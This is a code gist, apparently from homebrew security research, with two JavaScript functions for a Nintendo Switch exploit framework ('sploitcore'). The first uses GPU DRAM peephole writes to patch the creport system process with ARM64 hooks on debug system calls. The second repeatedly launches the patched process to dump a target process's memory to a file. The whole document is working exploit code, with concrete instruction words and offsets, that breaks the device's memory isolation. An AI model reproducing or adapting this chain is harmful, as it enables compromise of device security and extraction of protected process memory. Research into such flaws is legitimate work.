
@hexkyz
Created December 28, 2018 19:52
sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
  // Rewrite a process image in DRAM through the GPU (presumably creport's, per the
  // function name and the caller): map the GPU MMIO window, point the channel at
  // the 1 MiB-aligned DRAM page that holds the image, then perform a fixed
  // sequence of 32-bit peephole writes at offsets relative to that page.
  //
  // Parameters:
  //   ch_base_addr - channel base address, forwarded to nvhax_patch_channel
  //   dram_addr    - DRAM address of the image; bits 20+ select the page that is
  //                  mapped, bits 16-19 become the offset every write is relative to
  //   pid          - target process id stored in the image
  //   mem_offset   - memory offset stored in the image
  //   mem_size     - block size stored in the image; exactly 0x4000 selects the
  //                  alternate pair of words at +0x16688 / +0x1668C
  // Returns [gpu_io_vaddr, ch_iova] so the caller can reuse the mapped context.
  var base_gpu_va = [0, 0x04];
  var page_base = dram_addr & 0xFFF00000;
  var page_off = dram_addr & 0x000F0000;

  // Map GPU MMIO, then patch the channel with the base DRAM address
  var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
  var ch_iova = this.nvhax_patch_channel(ch_base_addr, page_base);

  // First two words of the svcReadDebugProcessMemory hook depend on the block size
  var read_hook_head = (mem_size === 0x4000)
    ? [[0x16688, 0x90000064], [0x1668C, 0x91100080]]
    : [[0x16688, 0xF0000044], [0x1668C, 0x91000080]];

  // [offset-within-page, 32-bit word] pairs; written in exactly this order.
  // The word values are opaque here and are kept verbatim from the original.
  var words = [
    // Write target PID somewhere
    [0x2A000, pid],
    [0x2A008, 0],
    [0x2A010, mem_size],
    [0x2A018, mem_offset],
    // Replace "nnMain" branch
    [0x000D8, 0x9400595A],
    // Install svcDebugActiveProcess hook
    [0x16640, 0x900000A4],
    [0x16644, 0xF9400081],
    [0x16648, 0xD4000C01],
    [0x1664C, 0x900000A4],
    [0x16650, 0xB9002080],
    [0x16654, 0xB9002481],
    // Install svcGetDebugEvent hook (process)
    [0x16658, 0x900000A4],
    [0x1665C, 0x91010080],
    [0x16660, 0xB9402481],
    [0x16664, 0xD4000C61],
    [0x16668, 0x900000A4],
    [0x1666C, 0xB9003080],
    // Install svcGetDebugEvent hook (thread)
    [0x16670, 0x900000A4],
    [0x16674, 0x91010080],
    [0x16678, 0xB9402481],
    [0x1667C, 0xD4000C61],
    [0x16680, 0x900000A4],
    [0x16684, 0xB9003080],
  ];
  // Install svcReadDebugProcessMemory hook (size-dependent head, then the common tail)
  words = words.concat(read_hook_head, [
    [0x16690, 0x900000A4],
    [0x16694, 0xF9400C85],
    [0x16698, 0xF8424081],
    [0x1669C, 0xF9403082],
    [0x166A0, 0x8B050042],
    [0x166A4, 0xB9401083],
    [0x166A8, 0xD4000D41],
    [0x166AC, 0x900000A4],
    [0x166B0, 0xB9007080],
    // Return
    [0x166B4, 0xD65F03C0],
  ]);

  for (var i = 0; i < words.length; i++) {
    var target = utils.add2(base_gpu_va, page_off + words[i][0]);
    this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, target, words[i][1]);
  }

  return [gpu_io_vaddr, ch_iova];
}
sploitcore.prototype.nvhax_dump_proc = function(sm_handle, ch_base_addr, pid, start_offset, end_offset, is_small) {
  // Read the memory of process `pid` from start_offset towards end_offset in
  // fixed-size blocks, handing every block to this.memdump under the same path.
  // Per block: launch creport, patch it via nvhax_patch_creport, start it, copy
  // the block into nvservices and then out into a local buffer, dump it, and
  // finally read the status word; a non-zero status ends the loop early.
  //
  // Parameters:
  //   sm_handle    - forwarded to launch_proc / start_proc
  //   ch_base_addr - forwarded to nvhax_patch_creport
  //   pid          - target process id
  //   start_offset - first offset to read
  //   end_offset   - loop stops once the cursor reaches this (note: a full block
  //                  is still read when fewer bytes remain, so the last block may
  //                  extend past end_offset)
  //   is_small     - truthy selects 0x4000-byte blocks and a different data VA
  //                  instead of the default 0x8000
  var staging_buf = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
  var creport_tid = [0x00000036, 0x01000000];
  var creport_dram_addr = 0x94950000;
  var status_gpu_va = [0x7A000, 0x4];

  // Use smaller blocks instead
  var block_size = is_small ? 0x4000 : 0x8000;
  var data_gpu_va = is_small ? [0x72400, 0x4] : [0x71000, 0x4];

  // Allocate memory buffer
  var out_buf = this.malloc(block_size);
  var status = 0;

  for (var cursor = start_offset; !status && cursor < end_offset; cursor += block_size) {
    // Launch creport in waiting state, patch it, then start it
    var proc_pid = this.launch_proc(sm_handle, 0x03, creport_tid, "120", 0x02);
    var ctx = this.nvhax_patch_creport(ch_base_addr, creport_dram_addr, pid, cursor, block_size);
    var gpu_io_vaddr = ctx[0];
    var ch_iova = ctx[1];
    this.start_proc(sm_handle, proc_pid);

    // Copy memory into nvservices, then out of nvservices, then dump it
    this.nvhax_dram_memcpy(gpu_io_vaddr, ch_iova, data_gpu_va, staging_buf, block_size);
    this.do_nvdrv_memcpy_out(out_buf, staging_buf, block_size);
    this.memdump(out_buf, block_size, "memdumps/dram.bin");

    // Check debug SVC result (read after the cursor has been consumed for this block)
    status = this.nvhax_peephole_read32(gpu_io_vaddr, ch_iova, utils.add2(status_gpu_va, 0x70));
  }

  this.free(out_buf);
}